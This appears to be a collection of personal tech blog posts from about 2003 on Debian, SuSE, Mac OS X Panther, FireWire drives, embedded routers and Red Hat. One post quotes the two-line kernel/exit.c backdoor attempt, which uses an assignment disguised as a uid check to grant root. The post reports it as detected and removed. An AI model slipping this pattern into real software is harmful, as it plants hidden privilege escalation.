Debian Machines has been Compromised

Last week, it was reveal that some Debian project machines has been compromised.

Today, I received the investigation report from debian-announce mailing list. The root cause is the local exploit from 2.4.18 kernel. Luckily, it is not a remote exploit.

The flaw has been fixed in the newest 2.4.23 kernel. That also hints me to upgrade kernel.

SuSE offers free download

Now SuSE, ranked 2nd in market shares, offers free download using FTP installation, instead of providing free Evaluation CD.

See this thread:
Free SUSE LINUX 9.0 download version available

An act to capture RedHat user to SuSE.

When I have time, I will try to install it on VMWare.

Firewire HD case with Prolific PL3507 bootable?

I recently purchased a Firewire/USB2 Combo HD case (HD-D2-U2FW ). This case equips with two Firewire ports so that I can use one to connect my iBook and another for slim DVR-K11 Writer.

Actually I have another Firewire HD case (
HD-337 Combo
) installed with a 5 years old Maxtor 6.4GB. I had already installed Panther on this external drive. With Jaguar in the iBook's internal harddisk, I can dual-booting it sucessfully (by setting Startup Disk or pressing Option button when start). However, after swapping the external disk to the new case, it was unable to boot. Swapping back to HD-337 case everything is normal. I originally thought that I have a faulty case, but the disk in the new case is able to mount on Jaguar and I am able to see its content. It is just that my old iBook 2001 cannot detect it and boot from this device.

Panther Impressions

I finally get a chance to install Panther separately on a external Firewire disk . It is a 6.4GB hard disk previously hosted in punknix (my Debian server). I run Panther CD on Jaguar, it will reboot and then goes into installation process.

This is my first impressions about Panther, I am telling what I feel:

  • In general, it is faster than Jaguar, more responsive, even on the same hardward with Firewire disk.
  • Booting up and shutting down Panther is faster than Jaguar.
  • DVD Player 4.0 has a new face. The advancement is far better than 2.x -> 3.0.
  • New Finder is faster, but also needs more improvement. Although I don't like Windows Explorer, but I dislike it more.
  • Panther is huge. Installing Panther (Disc 1 -3 and Xcode) causing me around 4.5GB, with only 1.9GB left on my 6.4GB Firewire disk. How I can upgrade Panther on my 10GB HD equipped iBook G3/500? May be it's time to upgrade harddisk...
  • CPU Monitor is replaced by Activity Monitor. CPU bar has no great difference. In addition, it can show running processes.
  • Safari now turns to 1.1 (v110), against 1.0 (v85) in Jaguar. So far, I can't see
    any significant enhancement, I will need more time to find it out.

So far, as I am not upgrading from 10.2 but dual booting 10.3, I didn't use it very often. Many 10.3 features such as Expose and Fast User Switching were not explored. I will test it and report later. BTW,
Ars Technica has a very comprehensive

review of Panther
. It's technical but worth reading.

Hard Disk Nightmare

My harddisk resides in PC near to its end. It can be powered up sometimes, but in some occasion the harddisk stop running after idle it for a while. The problem existed a monthe ago. May be this is caused by running e2k and BT heavily. Some of my friends said those p2p applications overload the disk too much.

Last week the problem occured more frequent. Before it totally die I decided to replace it with a new harddisk. So I bought Western Digital 40GB 7200rpm, 2MB cache, it is cheapest among the same and have proven good record. However, it is the beginning of my nightmare. I plugged in the new disk and power up the PC, a noise of very high frequency was heard. I guess it was the noise from the motor driving the disk, not the disk head. Next day, I went to the shop that I bought the disk for replacement, but the salesman pointed me to the distributor. Fine, the day after I went to the distributor (it is quite near to my home), and they were very helpful to replace a new one for me. I went home and carried out partition reallocation work.

Pebble and m0n0wall : Favourite Embedded OS for wireless network

I ordered two AMD SC520-powered net4501 and net4521 embedded board from
Soekris in May. I have evaluated and tested various embedded OS distributions on these two boards. Lastly, I finally sort out two nice distros: pebble and m0n0wall.

Pebble is a trimmed-down version of Debian, in additon with some custom packages (e.g. 2.4.22 kernel, hostap driver, NoCatAuth, etc. ). It has everything you need for a wireless router and auth gateway. I like pebble mainly because it is based on Debian. When I need more packages, I can just run apt-get. Configuration of pebble is just like other Debian or Linux systems, by modifying files in /etc. However, the size of pebble is quite large when comparing to other serious embedded distros such as LEAF. It is because huge perl packages are required for NoCatAuth. Pebble could be nicely fitted in 64MB Compact Flash card. If you need to run apt-get to some packages, you will need at least 128MB. But it is ok for now, as it is quite hard to find 64MB CF in the market.

Linux Kernel Back Door Attempt

Kernel Trap has a very interesting article describing an attempt to inject a back door to 2.6 kernel for gaining a root access:

Here are two lines are in kernel/exit.c:

+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;

It was found that someone had directly modified the BitKeeper source tree. These changes has been detected by BitMover founder Larry McVoy and is now removed. Andreas Dilger pointed out that had the change gone undetected "it might have taken a good while to find".

One Last Thing for not Upgrading to Panther

Panther had been out on Oct 24. Naturally, I would like to upgrade from Jaguar to Panther on my iBook. I followed the issues on driver and application support closely, and there is no major problems while vendors agressively post their driver and application updates for Panther. Now, fink 0.6.1 is released for Panther, which is quite essential for me, and I am now planning to upgrade... but wait!

At the moment, there is just one reason left for why not upgrading. I am not very sure that Panther could support Firewire DVR-K11. My iBook is now running 10.2.8 and I have to use PatchBurn utility to patch the driver to make it work. However, this trick does not work on Panther. I found no information on which 3rd-party DVD-Writer are supported. Of course, upgrade to Panther, I can still burn CD/DVD from Roxio Toast, but not by Disk Copy, Finder, and those iApps. That's a real shame. I have a 6GB 3'5" hard disk spare so that I can install Panther on an external Firewire case for trial and testing. Unfortunately, I would not be able to verify it since my iBook one has only one Firewire port and is occupied by the external HD. Otherwise, I have to look into kernel plug-ins. That's too many annoying... and I hate it. Oh, may be it's time to buy 15' Powerbook.

Paying for Red Hat Enterprise Linux? Go Debian!

Yesterday, one of my managers sent me a two links about Redhat's discontinuing support of 7.x to 8.x by end of December and 9.x by end of April 2004. Alternatively, it leaves out a RedHat-sponsored Fedora project to provide free, community supported Linux distrobution.

While many users (mainly end-users and SMEs, I think) are not very happy by this, my first feeling is that RedHat, being a commerical software company, is doing a right thing at a right time. When I once realize that Redhat is a company, this day will finally arrive, and now it has arrived. I don't feel disappointed, as I don't use RedHat..... I use Debian, another community-support Linux, backed by a non-profit organization, now having a very large user and a good developer base.

I agree that the Debian's installation process is not as smooth as Redhat, the software bundled in its stable version (woody) is not up-to-date as in Redhat (or may be out-dated). And yes, it has a long release cycle. But Debian has a very strict policy that only critical bug fix will only be released, it is a good thing and that's why it is so stable. With Debian you can update your system with security fixes with just two commands (apt-get update; apt-get upgrade), even without rebooting unless you upgrade the kernel. For me using Linux as a server, Debian is a good choice. Current Redhat user should think about switching to Debian. May be Debian community should launch a Switch campaign just like Apple. But those business companies using Linux should continue using Redhat to deploy their systems or applications, Redhat's commerial support and their expertise in Linux is still the first grade among others.

iBook G4, no more G3 Mac

Yesterday, Apple announced a new iBook G4, which put G3 into Apple's history. G4-based machines now become entry level Macs (iBook, iMac, eMac). Surprisingly, Apple does not want to make the coming PPC750GX for its iBook line. By discarding G3, Apple's position with Motorola and IBM has swapped. IBM now provides high-end G5 processors while Motorola suppies low end G4. It was not like a year ago, IBM only supplies G3 for lower end Mac. Apple may have its own agenda to abandon G3. Strategically, removing G3 while retaining G4 makes Apple easier for their design and production. When the new product is revised, they only need to upgrade chipsets and logicboard and for all G4 lines. Keep upgrading and designing G3-based product will only make the design and manufacturing cost higher.